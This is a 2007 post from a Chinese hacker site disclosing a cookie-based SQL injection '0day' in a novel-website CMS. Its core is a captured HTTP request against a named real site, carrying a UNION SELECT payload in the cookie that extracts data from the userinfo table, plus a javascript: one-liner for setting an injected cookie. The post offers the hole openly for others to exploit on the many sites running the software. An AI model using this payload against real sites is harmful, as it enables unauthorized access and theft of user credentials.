发一个终点文学0DAY - 华夏黑客同盟

| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 |

服务导航

我要发布

主力频道

精华收集

光盘刻录

您现在的位置：华夏黑客同盟 >> Hack >> 脚本漏洞攻击 >> 正文

用户登录

新用户注册

[图文]发一个终点文学0DAY

★★★

【字体：小大】

发一个终点文学0DAY

作者：伤心的鱼文章来源：原创点击数：更新时间：2007-10-29

这好长时间了当初好象是小乐B给俺的拿到以后以为能是个很好的0day 结果太不好利用只能cookie注射小JB志研究了一会告诉俺只能cookie 我又本地架设了一个确实是只能用cookie注射来猜密码确实能猜出来
本地架设的知道表名猜的也快~ 再放着好张毛了扔出来玩吧好多小说网站用的这套程序~ 抓包数据如下

POST /adurl.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: www.koobook.com
Content-Length: 4
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: cnzz02=53; rtime=0; ltime=1187688366927; cnzz_eid=77370945-; ASPSESSIONIDSQASSCDR=JPIPGFCBMKKKGNAGPILAFOMJ;

CnEndWeb%5FUser=log%5Fsex=%CF%C8%C9%FA&log%5FUserName=thenines&log%5FUserID=476%20and%201=2%20union%20select%20id%2C5%2C7%

20from%20userinfo%20where%20id%3d2

uploads/200710/25_111408_20071025_110520.png

注射语句就是cookie了不会的百度一下找cookie注射语句 javascript:alert(document.cookie="id="+escape("1 and 1=1"))

责任编辑：朱倩　　联系方式　Email：朱倩

电话：51228163

上一篇黑客： pw的一个放后门的方式

下一篇黑客：找出IIS中隐藏的网站

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

姓名：	* 游客填写　·注册用户
主页：
评分：	1分 2分 3分 4分 5分
评论内容：
验证码： *

请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论。用户需对自己在使用本站服务过程中的行为承担法律责任（直接或间接导致的）。本站管理员有权保留或删除评论内容。评论内容只代表网友个人观点，与本网站立场无关。

最新hack更新

最新推荐资讯

最新会员软件

最新推荐视频

最新推荐动画

mailto:webmaster@77169.net
咨询QQ号:836982 / 59280880
联系站长 QQ38588913